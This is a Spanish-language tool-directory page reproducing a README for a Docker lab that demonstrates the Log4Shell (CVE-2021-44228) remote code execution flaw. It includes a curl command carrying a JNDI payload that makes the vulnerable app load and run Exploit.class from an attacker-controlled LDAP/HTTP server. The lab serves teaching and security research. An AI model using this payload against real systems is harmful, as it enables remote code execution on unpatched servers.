Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228_Log4Shell — Demo de exploit RCE basado en Docker para Log4Shell (CVE-2021-44228) con aplicación Spring Boot vulnerable, servidor LDAP malicioso y entrega de carga útil mediante inyección JNDI. | Kitploit
Herramientas/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

Demo de exploit RCE basado en Docker para Log4Shell (CVE-2021-44228) con aplicación Spring Boot vulnerable, servidor LDAP malicioso y entrega de carga útil mediante inyección JNDI.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
2hace 4 mesesAún no revisado
Compartir

Demo de explotación de la vulnerabilidad Log4Shell (CVE-2021-44228)

Este proyecto simula un escenario de ataque RCE a través de la vulnerabilidad Log4Shell en la librería Apache Log4j 2.

Componentes

  1. vulnerable-app: Aplicación Spring Boot que utiliza Log4j 2.14.1.
  2. attacker: Contiene un servidor LDAP malicioso (marshalsec) y un servidor HTTP que sirve el archivo malicioso Exploit.class.

Procedimiento

1. Iniciar el entorno

Requiere Docker y Docker Compose instalados.

root@kitploit:~
docker compose up --build

Espera hasta que ambos contenedores estén listos. vulnerable-app se ejecutará en el puerto 8080.

2. Realizar el ataque

Abre una nueva terminal y envía una solicitud que contenga el payload JNDI mediante la cabecera X-Api-Version:

root@kitploit:~
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. Verificar los resultados

  • Revisa los logs del contenedor vulnerable-app. Verás el mensaje del payload registrado.
  • Revisa los logs del contenedor attacker. Verás la conexión LDAP redirigida al servidor HTTP.
  • Verificar RCE: Comprueba si el archivo /tmp/pwned ha sido creado dentro del contenedor vulnerable-app:
root@kitploit:~
docker exec -it vulnerable-app ls -la /tmp/pwned

Si el archivo existe, ¡significa que el código malicioso Exploit.class se ejecutó correctamente!

Advertencia

Este proyecto tiene fines exclusivamente educativos y de investigación en seguridad. No lo utilices bajo ninguna circunstancia con fines ilegales.

Descargar herramienta